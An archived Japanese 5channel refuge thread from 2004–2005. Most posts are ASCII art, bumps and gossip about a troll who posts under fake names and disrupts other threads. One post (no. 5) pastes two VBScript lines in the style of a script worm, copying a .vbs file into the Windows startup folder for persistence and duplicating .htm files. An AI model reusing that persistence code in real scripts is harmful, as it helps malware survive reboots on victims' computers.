5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

    (´;゚;ё;゚;)     

1 :壁に耳あり、障子にメアリーさん:04/10/30 19:25:54
避難所ってことで。
sage進行でお願いします。

2 :壁に耳あり、障子にメアリーさん:04/10/30 19:32:10
キモです。

3 :壁に耳あり、障子にメアリーさん:04/10/30 19:35:13
ここかな?

4 :壁に耳あり、障子にメアリーさん:04/10/30 19:42:09
ここです。

5 :壁に耳あり、障子にメアリーさん:04/10/30 19:46:21
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

6 :壁に耳あり、障子にメアリーさん:04/10/30 20:45:18
ありゃりゃ

7 :漢ならプレーソフィルター ◆echo/MLJe6 :04/10/31 06:44:32
壁へようこそ

8 :壁に耳あり、障子にメアリーさん:04/10/31 09:55:17
>>5
まじでシネ

9 :壁に耳あり、障子にメアリーさん:04/11/01 10:39:24
ここは使えないの?

10 :壁に耳あり、障子にメアリーさん:04/11/01 19:34:59
>>9
マターリヲチするなら使って構わないよ。
但し鬼女板のノリは勘弁して。

11 :壁に耳あり、障子にメアリーさん:04/11/01 21:20:58
ヤダ
殺伐したいのだ

12 :壁に耳あり、障子にメアリーさん:04/11/07 08:22:45


13 :壁に耳あり、障子にメアリーさん:04/11/09 09:24:40
744 : ◆8lDJ45nbF6 :04/11/07 19:50:40 ID:m/7ssmeJ
>>740
これだよ。しかしまだ私を覚えていてくれる人がいるとは・・・!

796 : ◆8lDJ45nbF6 :04/11/08 07:34:34 ID:4Ik3AAuE
何だよ、コピペがやりたかったの?
ご苦労!

833 : ◆8lDJ45nbF6 :04/11/08 22:37:40 ID:4Ik3AAuE
>>831
何か懐かしいね。
今はもうあまり食い込める話じゃないから、ログたまったら見てるよ。
CC出てきたんだね。でも何か鬼板とのコラボスレでのCCとは別人のよう・・・
あんなに意地悪節絶好調だったのに!
スイッチ切れたのかな。

私ゃ鬼板には最近さっぱり行ってないw
ではまたどこかで。
コピペと鬼ごっこでもしようかな。


14 :壁に耳あり、障子にメアリーさん:04/11/16 13:27:31
  _____________
  |                   /| ガチャ
  |  /⌒i             / |
  |-/`-イ────────ー'  |
   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 
  _____________
  |__/⌒i__________/|
  | '`-イ:::    -・=- , (-・=-   |
  |ヽ ノ (6    ⌒ ) ・ ・)( ^ヽ   |
   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

  _____________
  |                    | パタン
  |                   |
  |───────────ー─ |
   ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄




15 :壁に耳あり、障子にメアリーさん:04/11/17 08:20:13
ヒー

16 :壁に耳あり、障子にメアリーさん:04/11/22 09:45:05
□□□□■□□□□□■□□□□□□□□□□□□□□□□□□□□□
□□□■■□□□□□■□□□□□□□■■■■■■■■■■■■□□
□□■■□□□□□■■■■■■□□□□□□□□□□□□□■■□□
□■■□□■□□□■□□□□■□□□□□□□□□□□□■■□□□
□□■□■■□□■■■□□■■□□□□□□□□□□□■■□□□□
□□□■■□□■■□■■■■□□□□□□□□□□□■■□□□□□
□□■■□□□□□□□■■□□□□□□□□□□□■■□□□□□□
□□■□□□■□□□■■■■□□□□□□□□□□■□□□□□□□
□■■■■■■□□■■□□■■□□□□□□□□□■□□□□□□□
□□□□■□□□■■□□□□■■□□□□□□□□■□□□□□□□
□□■□■□■□□□□■■□□□□□□□□□□□■□□□□□□□
□□■□■□■□□□□□■■□□□□□□□□□□■□□□□□□□
□■■□■□■□□□□□□□□□□□□□□□□□■□□□□□□□
□■□□■□□□□■■■□□□□□□□□□□□□■□□□□□□□
□□□□■□□□□□□■■■□□□□□□□□□□■□□□□□□□
□□□□■□□□□□□□□■■□□□□□□■■■■□□□□□□□

17 :壁に耳あり、障子にメアリーさん:04/12/15 16:13:46
きも( ´;゚;ё;゚;)人(;゚;ё;゚;` ) ぃょぅ で再開

18 :壁に耳あり、障子にメアリーさん:04/12/31 22:59:46
足跡ペタリ

19 :壁に耳あり、障子にメアリーさん:05/01/18 21:04:01
ついでにほしゅ

20 :壁に耳あり、障子にメアリーさん:05/02/01 17:17:52
(´;゚;ё;゚;)もひゃひゃひゃひゃひゃひゃひゃひゃひゃ

21 :壁に耳あり、障子にメアリーさん:05/02/07 06:41:55
はんはん

22 :壁に耳あり、障子にメアリーさん:05/02/07 20:55:28
はんはん?


  ァ  ∧_∧ ァ,、
 ,、'` ( ´∀`) ,、'`
  '` ( ⊃ ⊂)  '`

23 :壁に耳あり、障子にメアリーさん:05/03/01 23:29:17
( ゚Д゚)y─┛~~

24 :壁に耳あり、障子にメアリーさん:2005/03/21(月) 19:00:19
   

25 :壁に耳あり、障子にメアリーさん:2005/03/21(月) 19:48:00
( ゚Д゚)ゴルァ!

26 :壁に耳あり、障子にメアリーさん:2005/03/27(日) 03:26:12
( ゚Д゚)y─┛~~

27 :壁に耳あり、障子にメアリーさん:2005/04/28(木) 00:27:08
うわ、今更みっけた わかりにくー

なので記念カキコ

28 :壁に耳あり、障子にメアリーさん:2005/04/28(木) 07:19:44
おいでやす!

29 :壁に耳あり、障子にメアリーさん:2005/05/06(金) 20:45:43
( ゚Д゚)y─┛~~

30 :壁に耳あり、障子にメアリーさん:2005/05/14(土) 15:49:56
どこもトの人々に乗り込まれ
ここだけが安住の場になりそう

31 :壁に耳あり、障子にメアリーさん:2005/05/14(土) 15:55:04
( ゚Д゚)y─┛~~ ヲチャはぃょぅに集まってるが

32 :壁に耳あり、障子にメアリーさん:2005/05/14(土) 16:41:40
あそこもトの人いるでしょ
時間の問題の希ガス

33 :壁に耳あり、障子にメアリーさん:2005/05/15(日) 23:04:28
あ、こんなスレもあったね

34 :壁に耳あり、障子にメアリーさん:2005/06/05(日) 20:06:57
キティとの共存は疲れるな
あのスレ使うのか〜

35 :壁に耳あり、障子にメアリーさん:2005/06/05(日) 20:21:43
すごい自演だな。
図星でキレたのかね。

36 :壁に耳あり、障子にメアリーさん:2005/06/06(月) 22:50:19
こっちは知らない人多そうだな

37 :壁に耳あり、障子にメアリーさん:2005/06/14(火) 13:28:19
ここは無事か。

38 :壁に耳あり、障子にメアリーさん:2005/06/14(火) 13:39:39
こことあと1つは大丈夫らしい

39 :壁に耳あり、障子にメアリーさん:2005/06/14(火) 20:36:14
あと2つあるよ

40 :壁に耳あり、障子にメアリーさん:2005/06/14(火) 22:12:14
あそこの事をすっかり忘れてたよ


41 :壁に耳あり、障子にメアリーさん:2005/06/15(水) 20:25:32
もうスレが機能していない
カキコしないしか方法が無いように思う

42 :壁に耳あり、障子にメアリーさん:2005/06/15(水) 20:35:39
ここで尾知していいですか?向こうもうだめぽ

43 :壁に耳あり、障子にメアリーさん:2005/06/15(水) 20:37:15
避難だよ、全員集合w

44 :壁に耳あり、障子にメアリーさん:2005/06/15(水) 20:41:05
旦那に言いたいの232はクマかな

45 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 19:31:54
久々に見たら訳ワカラン事に・・・
一体何があったの?

46 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 19:32:35
>>45
何って・・・・何から言えばいいのか

47 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 20:14:20
わからないほど時は流れて
(略)
あの日 あの時 あの場所で

電波がスレ乗っ取り→攻撃されて「もう来ない」発言→未だ燻ってる
ただそれだけのことさ

48 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 20:20:45
電波が呼び込んだアフォが張り切ってるからウザなんだよ



49 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 20:31:01
説明すまん、そしてありがとう
どこから流れてきた電波?VIPとか?鬼女なの?
キダンがどうとか他スレ読んでも訳ワカランかったので

50 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 20:35:02
>>49
ミドリ=電波

51 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 20:37:53
暴れた電波もうざいけど
やたら張り切ってる頭の回転の鈍いのの方が邪魔だよね

52 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 20:55:26
ミドリってあのミドリ?昔居てトナメに参加してたという・・・
それともニューキャラ?
いきなり現れて荒らしだしたの?
オーシエテチャンですまん

53 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 20:57:50
>>52
あのミドリで正解
ずっと突撃往復で粘着してた
トナメは参加じゃなくて邪魔してたんだよ

54 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 21:04:27
何度も引退宣言しては名無しで荒らし行為(でも手口が一緒なのでバレバレ)
つっこまれるとカミングアウトして引退宣言
ずっとこれの繰り返し

55 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 21:10:57
へー、私はトナメ参加してなかったけど
一連の騒動の時にログ読んでた分に
もう改心して仲良くトナメ参加やってたんだと思った
ずっーと荒らしてたんだ、しつこいね

じゃあリークだなんだとやってたのはチーム(ファミリーだっけ?)に
入り込んでたミドリの仕業だったのか
トナメコピペが何でまだ?と思ったら、そういう訳か

56 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 21:12:52
一時オニヲチャVSトナメヲチャにしようと躍起になってたよ

57 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 21:16:00
>>55
ファミリーに入ってたんでは無く、あの異臭でいつも出て行けと言われてたんだよ
トナメヲチャはあいつから逃げたけど、避難誘導は実は面白がってたミドリのしわざ
最後メールで振り落とされたので怒ってあのヲチ荒らし



58 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 21:25:12
だから最初のミドリ騒動関連スレを回ってたという事か
振り落とされて怒ってたのは○○じゃね?とミドリと別の毒女と
言われてなかったっけ?
それでそうなんだーふーんと思ってたよ
じゃあトナメの人はミドリと気づいてたんだね

59 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 21:32:28
>>58
ヲチ香のコテでトナメヲチに出た後に気付いたかな
あれは自演と騙りをフルに使うから、最初は皆混乱して・・
気付いてみればやってる事は前から同じ手口だからね


60 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 21:46:11
避難所キチガイのミドリがここといくつかを知らないのが救い
知りたがって晒してをやりつくして誰かが他の避難所を匂わせても
「そんなのあるわけないじゃん」と存在を否定してるからね

61 :壁に耳あり、障子にメアリーさん:2005/06/28(火) 21:51:25
なるほどなるほど

確かに同じ手口だもんね
解説感謝
よくわかりました

62 :壁に耳あり、障子にメアリーさん:2005/06/29(水) 03:13:07
ミドリが玲子なの?で、ヲチ香?
で、クスクス?

わけわからん

63 :壁に耳あり、障子にメアリーさん:2005/06/29(水) 17:39:01
>>62
緑=ヲチ香は本人が認めてる 
玲子が暴れてた時は酉ではなくキャップの時代
現玲子は緑が化けている可能性はある
玲子の酉は今昔物語で今年3月に初出
その後すぐトナメが本格化して、ヲチやトナメスレに酉の玲子が出た
クスクスはヲチには愉快犯も混ざってる模様だが、緑は好んで良く使うね



64 :壁に耳あり、障子にメアリーさん:2005/06/29(水) 21:52:37
うっとおしいなあ
スレ乱立ってボスヲチと同じだ
もしかして古コテ煽ってるのは・・・

65 :壁に耳あり、障子にメアリーさん:2005/06/29(水) 22:07:59
普通のヲチができる日なんてこないんじゃないか
という気持ちになってます

66 :壁に耳あり、障子にメアリーさん:2005/06/29(水) 22:10:57
最悪かどっかに緑ヲチでも立てれば満足するだろうか

67 :壁に耳あり、障子にメアリーさん:2005/06/29(水) 22:32:13
人が集まってるスレで自演して暴れるのが目的だから
巣を作ったところで人がいなけりゃ里に下りてくるよ

68 :壁に耳あり、障子にメアリーさん:2005/07/08(金) 19:21:38
チヲは落ちた?

69 :壁に耳あり、障子にメアリーさん:2005/07/08(金) 19:46:12
落ちたね

70 :壁に耳あり、障子にメアリーさん:2005/07/23(土) 01:26:57
ふぉっしゅ

71 :壁に耳あり、障子にメアリーさん:2005/07/23(土) 04:53:38
(´o`)フッフー

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)